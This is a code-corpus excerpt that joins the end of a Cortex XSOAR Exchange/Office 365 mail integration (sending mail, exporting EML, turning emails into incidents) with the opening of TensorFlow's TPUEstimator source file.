additional_headers (str): Headers list as string. Example: headerName1=headerValue1,headerName2=headerValue2
Returns:
Dict. Headers dictionary in the form of: `header_name: header value`
"""
headers = dict()
for header in argToList(additional_headers):
header_name, header_value = header.split('=', 1)
class TempClass(ExtendedProperty):
distinguished_property_set_id = 'InternetHeaders'
property_name = header_name
property_type = 'String'
try:
Message.register(header_name, TempClass)
headers[header_name] = header_value
except ValueError as e:
demisto.debug('EWSO365 - Header ' + header_name + ' could not be registered. ' + str(e))
return headers
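# Illustrative example (hypothetical values): headers arrive as a comma-separated
# "name=value" string; each name is registered on Message as an InternetHeaders
# extended property so exchangelib can serialize it:
#   add_additional_headers('X-Custom-Header=foo,X-Other-Header=bar')
#   -> {'X-Custom-Header': 'foo', 'X-Other-Header': 'bar'}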
def send_email(client: EWSClient, to, subject='', body="", bcc=None, cc=None, htmlBody=None,
attachIDs="", attachCIDs="", attachNames="", manualAttachObj=None,
transientFile=None, transientFileContent=None, transientFileCID=None, templateParams=None,
additionalHeader=None, raw_message=None):
to = argToList(to)
cc = argToList(cc)
bcc = argToList(bcc)
# Basic validation - we allow pretty much everything but you have to have at least a recipient
# We allow messages without subject and also without body
if not to and not cc and not bcc:
return_error('You must have at least one recipient')
if raw_message:
message = Message(
to_recipients=to,
cc_recipients=cc,
bcc_recipients=bcc,
body=raw_message
)
else:
if additionalHeader:
additionalHeader = add_additional_headers(additionalHeader)
# collect all types of attachments
attachments = collect_attachments(attachIDs, attachCIDs, attachNames)
attachments.extend(collect_manual_attachments(manualAttachObj))
attachments.extend(handle_transient_files(transientFile, transientFileContent, transientFileCID))
# update body and html_body with the templated params, if exists
template_params = handle_template_params(templateParams)
if template_params:
body = body.format(**template_params)
if htmlBody:
htmlBody = htmlBody.format(**template_params)
message = create_message(to, subject, body, bcc, cc, htmlBody, attachments, additionalHeader)
client.send_email(message)
return 'Mail sent successfully', {}, {}
def get_item_as_eml(client: EWSClient, item_id, target_mailbox=None):
"""
Retrieve item as an eml
:param client: EWS Client
:param item_id: Item id to retrieve
:param (Optional) target_mailbox: target mailbox
:return: Output tuple
"""
account = client.get_account(target_mailbox)
item = client.get_item_from_mailbox(account, item_id)
if item.mime_content:
mime_content = item.mime_content
if isinstance(mime_content, bytes):
email_content = email.message_from_bytes(mime_content)
else:
email_content = email.message_from_string(mime_content)
if item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(email_content.items())
]
for header in item.headers:
if (
header.name,
header.value,
) not in attached_email_headers and header.name != "Content-Type":
email_content.add_header(header.name, header.value)
eml_name = item.subject if item.subject else "demisto_untitled_eml"
file_result = fileResult(eml_name + ".eml", email_content.as_string())
file_result = (
file_result if file_result else "Failed uploading eml file to war room"
)
return file_result
def parse_incident_from_item(item):
"""
Parses an incident from an item
:param item: item to parse
:return: Parsed item
"""
incident = {}
labels = []
try:
incident["details"] = item.text_body or item.body
except AttributeError:
incident["details"] = item.body
incident["name"] = item.subject
labels.append({"type": "Email/subject", "value": item.subject})
incident["occurred"] = item.datetime_created.ewsformat()
# handle recipients
if item.to_recipients:
for recipient in item.to_recipients:
labels.append({"type": "Email", "value": recipient.email_address})
# handle cc
if item.cc_recipients:
for recipient in item.cc_recipients:
labels.append({"type": "Email/cc", "value": recipient.email_address})
# handle email from
if item.sender:
labels.append({"type": "Email/from", "value": item.sender.email_address})
# email format
email_format = ""
try:
if item.text_body:
labels.append({"type": "Email/text", "value": item.text_body})
email_format = "text"
except AttributeError:
pass
if item.body:
labels.append({"type": "Email/html", "value": item.body})
email_format = "HTML"
labels.append({"type": "Email/format", "value": email_format})
# handle attachments
if item.attachments:
incident["attachment"] = []
for attachment in item.attachments:
file_result = None
label_attachment_type = None
label_attachment_id_type = None
if isinstance(attachment, FileAttachment):
try:
if attachment.content:
# file attachment
label_attachment_type = "attachments"
label_attachment_id_type = "attachmentId"
# save the attachment
file_name = get_attachment_name(attachment.name)
file_result = fileResult(file_name, attachment.content)
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name),
}
)
except TypeError as e:
if str(e) != "must be string or buffer, not None":
raise
continue
else:
# other item attachment
label_attachment_type = "attachmentItems"
label_attachment_id_type = "attachmentItemsId"
# save the attachment
if attachment.item.mime_content:
mime_content = attachment.item.mime_content
attached_email = email.message_from_bytes(mime_content) if isinstance(mime_content, bytes) \
else email.message_from_string(mime_content)
if attachment.item.headers:
attached_email_headers = [
(h, " ".join(map(str.strip, v.split("\r\n"))))
for (h, v) in list(attached_email.items())
]
for header in attachment.item.headers:
if (
(header.name, header.value)
not in attached_email_headers
and header.name != "Content-Type"
):
attached_email.add_header(header.name, header.value)
attached_email_bytes = attached_email.as_bytes()
chardet_detection = chardet.detect(attached_email_bytes)
encoding = chardet_detection.get('encoding', 'utf-8') or 'utf-8'
file_result = fileResult(
get_attachment_name(attachment.name) + ".eml",
attached_email_bytes.decode(encoding),
)
if file_result:
# check for error
if file_result["Type"] == entryTypes["error"]:
demisto.error(file_result["Contents"])
raise Exception(file_result["Contents"])
# save attachment to incident
incident["attachment"].append(
{
"path": file_result["FileID"],
"name": get_attachment_name(attachment.name) + ".eml",
}
)
labels.append(
{
"type": label_attachment_type,
"value": get_attachment_name(attachment.name),
}
)
labels.append(
{"type": label_attachment_id_type, "value": attachment.attachment_id.id}
)
# handle headers
if item.headers:
headers = []
for header in item.headers:
labels.append(
{
"type": "Email/Header/{}".format(header.name),
"value": str(header.value),
}
)
headers.append("{}: {}".format(header.name, header.value))
labels.append({"type": "Email/headers", "value": "\r\n".join(headers)})
# handle item id
if item.message_id:
labels.append({"type": "Email/MessageId", "value": str(item.message_id)})
if item.id:
labels.append({"type": "Email/ID", "value": item.id})
labels.append({"type": "Email/itemId", "value": item.id})
# handle conversation id
if item.conversation_id:
labels.append({"type": "Email/ConversionID", "value": item.conversation_id.id})
incident["labels"] = labels
incident["rawJSON"] = json.dumps(parse_item_as_dict(item, None), ensure_ascii=False)
return incident
def fetch_emails_as_incidents(client: EWSClient, last_run):
"""
Fetch incidents
:param client: EWS Client
:param last_run: last run dict
:return:
"""
last_run = get_last_run(client, last_run)
try:
last_emails = fetch_last_emails(
client,
client.folder_name,
last_run.get(LAST_RUN_TIME),
last_run.get(LAST_RUN_IDS),
)
ids = deque(
last_run.get(LAST_RUN_IDS, []), maxlen=client.last_run_ids_queue_size
)
incidents = []
incident: Dict[str, str] = {}
for item in last_emails:
if item.message_id:
ids.append(item.message_id)
incident = parse_incident_from_item(item)
incidents.append(incident)
if len(incidents) >= client.max_fetch:
break
last_run_time = incident.get("occurred", last_run.get(LAST_RUN_TIME))
if isinstance(last_run_time, EWSDateTime):
last_run_time = last_run_time.ewsformat()
new_last_run = {
LAST_RUN_TIME: last_run_time,
LAST_RUN_FOLDER: client.folder_name,
LAST_RUN_IDS: list(ids),
ERROR_COUNTER: 0,
}
demisto.setLastRun(new_last_run)
return incidents
except RateLimitError:
if LAST_RUN_TIME in last_run:
last_run[LAST_RUN_TIME] = last_run[LAST_RUN_TIME].ewsformat()
if ERROR_COUNTER not in last_run:
last_run[ERROR_COUNTER] = 0
last_run[ERROR_COUNTER] += 1
demisto.setLastRun(last_run)
if last_run[ERROR_COUNTER] > 2:
raise
return []
def fetch_last_emails(
client: EWSClient, folder_name="Inbox", since_datetime=None, exclude_ids=None
):
"""
Fetches last emails
:param client: EWS client
:param (Optional) folder_name: folder name to pull from
:param (Optional) since_datetime: items will be searched after this datetime
:param (Optional) exclude_ids: exclude ids from fetch
:return: list of exchangelib.Items
"""
qs = client.get_folder_by_path(folder_name, is_public=client.is_public_folder)
if since_datetime:
qs = qs.filter(datetime_received__gte=since_datetime)
else:
tz = EWSTimeZone.timezone('UTC')
first_fetch_datetime = dateparser.parse(FETCH_TIME)
first_fetch_ews_datetime = EWSDateTime.from_datetime(tz.localize(first_fetch_datetime))
qs = qs.filter(last_modified_time__gte=first_fetch_ews_datetime)
qs = qs.filter().only(*[x.name for x in Message.FIELDS])
qs = qs.filter().order_by("datetime_received")
result = []
for item in qs:
if isinstance(item, Message):
result.append(item)
if len(result) >= client.max_fetch:
break
if exclude_ids and len(exclude_ids) > 0:
exclude_ids = set(exclude_ids)
result = [x for x in result if x.message_id not in exclude_ids]
return result
def test_module(client: EWSClient, max_fetch):
"""
test-module
* Max incidents per fetch <= MAX_INCIDENTS_PER_FETCH
* Account can be retrieved
* Account has read rights
* Test access to fetch folder
:param client: EWS Client
:param max_fetch: Max incidents per fetch
:return: "ok"
"""
try:
if int(max_fetch) > MAX_INCIDENTS_PER_FETCH:
return_error(f'Error - Max incidents per fetch cannot be greater than {MAX_INCIDENTS_PER_FETCH}. '
f'You provided: {max_fetch}')
account = client.get_account()
if not account.root.effective_rights.read: # pylint: disable=E1101
raise Exception(
"Success to authenticate, but user has no permissions to read from the mailbox. "
"Need to delegate the user permissions to the mailbox - "
"please read integration documentation and follow the instructions"
)
client.get_folder_by_path(
client.folder_name, account, client.is_public_folder
).test_access()
except ErrorFolderNotFound as e:
if "Top of Information Store" in str(e):
raise Exception(
"Success to authenticate, but user probably has no permissions to read from the specific folder."
"Check user permissions. You can try !ews-find-folders command to "
"get all the folders structure that the user has permissions to"
)
return "ok"
def sub_main():
is_test_module = False
params = demisto.params()
args = prepare_args(demisto.args())
# client's default_target_mailbox is the authorization source for the instance
params['default_target_mailbox'] = args.get('target_mailbox',
args.get('source_mailbox', params['default_target_mailbox']))
client = EWSClient(**params)
start_logging()
try:
command = demisto.command()
# commands that return a single note result
normal_commands = {
"ews-get-searchable-mailboxes": get_searchable_mailboxes,
"ews-move-item-between-mailboxes": move_item_between_mailboxes,
"ews-move-item": move_item,
"ews-delete-items": delete_items,
"ews-search-mailbox": search_items_in_mailbox,
"ews-get-contacts": get_contacts,
"ews-get-out-of-office": get_out_of_office_state,
"ews-recover-messages": recover_soft_delete_item,
"ews-create-folder": create_folder,
"ews-mark-item-as-junk": mark_item_as_junk,
"ews-find-folders": find_folders,
"ews-get-items-from-folder": get_items_from_folder,
"ews-get-items": get_items,
"ews-get-folder": get_folder,
"ews-expand-group": get_expanded_group,
"ews-mark-items-as-read": mark_item_as_read,
"send-mail": send_email,
}
# commands that may return multiple results or non-note result
special_output_commands = {
"ews-get-attachment": fetch_attachments_for_message,
"ews-delete-attachment": delete_attachments_for_message,
"ews-get-items-as-eml": get_item_as_eml,
}
# system commands:
if command == "test-module":
is_test_module = True
demisto.results(test_module(client, params.get('max_fetch')))
elif command == "fetch-incidents":
last_run = demisto.getLastRun()
incidents = fetch_emails_as_incidents(client, last_run)
demisto.incidents(incidents)
# special outputs commands
elif command in special_output_commands:
demisto.results(special_output_commands[command](client, **args)) # type: ignore[operator]
# normal commands
else:
output = normal_commands[command](client, **args) # type: ignore[operator]
return_outputs(*output)
except Exception as e:
start_logging()
debug_log = log_stream.getvalue() # type: ignore[union-attr]
error_message_simple = ""
# Office365 regular maintenance case
if isinstance(e, ErrorMailboxStoreUnavailable) or isinstance(
e, ErrorMailboxMoveInProgress
):
log_message = (
"Office365 is undergoing load balancing operations. "
"As a result, the service is temporarily unavailable."
)
if demisto.command() == "fetch-incidents":
demisto.info(log_message)
demisto.incidents([])
sys.exit(0)
if is_test_module:
demisto.results(
log_message + " Please retry the instance configuration test."
)
sys.exit(0)
error_message_simple = log_message + " Please retry your request."
if isinstance(e, ConnectionError):
error_message_simple = (
"Could not connect to the server.\n"
f"Additional information: {str(e)}"
)
else:
if is_test_module and isinstance(e, MalformedResponseError):
error_message_simple = (
"Got invalid response from the server.\n"
)
# Legacy error handling
if "Status code: 401" in debug_log:
error_message_simple = (
"Got unauthorized from the server. "
)
if "Status code: 503" in debug_log:
error_message_simple = (
"Got timeout from the server. "
"Probably the server is not reachable with the current settings. "
)
if not error_message_simple:
error_message = error_message_simple = str(e)
else:
error_message = error_message_simple + "\n" + str(e)
stacktrace = traceback.format_exc()
if stacktrace:
error_message += "\nFull stacktrace:\n" + stacktrace
if debug_log:
error_message += "\nFull debug log:\n" + debug_log
if demisto.command() == "fetch-incidents":
raise
if demisto.command() == "ews-search-mailbox" and isinstance(e, ValueError):
return_error(
message="Selected invalid field, please specify valid field name.",
error=e,
)
if is_test_module:
demisto.results(error_message_simple)
else:
demisto.results(
{
"Type": entryTypes["error"],
"ContentsFormat": formats["text"],
"Contents": error_message_simple,
}
)
demisto.error(f"{e.__class__.__name__}: {error_message}")
finally:
exchangelib_cleanup()
if log_stream:
try:
logging.getLogger().removeHandler(log_handler) # type: ignore
log_stream.close()
except Exception as ex:
demisto.error(
"EWS: unexpected exception when trying to remove log handler: {}".format(
ex
)
)
def process_main():
"""setup stdin to fd=0 so we can read from the server"""
sys.stdin = os.fdopen(0, "r")
sub_main()
def main():
# When running big queries, like 'ews-search-mailbox', the memory might not be freed by the garbage
# collector. The `separate_process` flag runs the integration in a separate process, which prevents
# memory leakage.
separate_process = demisto.params().get("separate_process", False)
demisto.debug("Running as separate_process: {}".format(separate_process))
if separate_process:
try:
p = Process(target=process_main)
p.start()
p.join()
except Exception as ex:
demisto.error("Failed starting Process: {}".format(ex))
else:
sub_main()
from MicrosoftApiModule import * # noqa: E402
if __name__ in ("__main__", "__builtin__", "builtins"):
main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import os
import signal
import sys
import threading
import time
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import _tpu_estimator_embedding
from tensorflow.python.tpu import error_handling
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_config
from tensorflow.python.tpu import tpu_context
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu import util as util_lib
from tensorflow.python.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow.python.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow.python.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
from tensorflow.python.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_REWRITE_FOR_INFERENCE_MODE = '_rewrite_for_inference'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Use tf.contrib.summary inside of host_calls.')
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather than a constant, is to allow
TPUEstimator to adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following values before each TPU training run:
- 1st TPU execution: iterations_per_loop = 4
- 2nd TPU execution: iterations_per_loop = 4
- 3rd TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multiple iterations_per_loop variables are found.
"""
graph = ops.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are usually too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
array_ops.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in variables.trainable_variables()
]
else:
return [control_flow_ops.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator.evaluate increases the eval step by 1 by default, so we add the remaining difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
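# For example, with iterations_per_loop=4 a single Session.run performs 4 eval
# steps on the TPU while Estimator's own bookkeeping adds only 1, so this op adds
# the remaining 4 - 1 = 3 to the eval step counter.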
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All reserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for an MNIST example of how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function are
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
host_calls['host_call'] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError('All hooks must be SessionRunHook instances, given: {}'
.format(hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls['eval_metrics'] = self.eval_metrics
if self.host_call is not None:
host_calls['host_call'] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(ops.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
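# A minimal eval_metrics sketch (hypothetical model_fn fragment): metric_fn runs on the
# CPU once `labels` and `logits` are transferred back from the TPU, and returns the
# usual name -> (metric_tensor, update_op) dict:
#
#   def metric_fn(labels, logits):
#     return {'accuracy': tf.metrics.accuracy(
#         labels=labels, predictions=tf.argmax(logits, axis=1))}
#
#   spec = TPUEstimatorSpec(mode=mode, loss=loss, train_op=train_op,
#                           eval_metrics=(metric_fn, [labels, logits]))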
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug('%s read iterations %s', self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info('%s received shutdown signal, stopping.', self._name)
return
yield iterations
def join(self):
logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initializes and shuts down the TPU system.
2. launches and joins the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here to avoid
# suspected issues due to the mesh layout changing on the second
# initialization.
self._should_initialize_tpu = not ctx.model_parallelism_enabled
self._tpu_compile_op = tpu_compile_op
def begin(self):
logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug('Infeed enqueue for iteration (%d, %d)', count, i)
session.run(self._enqueue_ops)
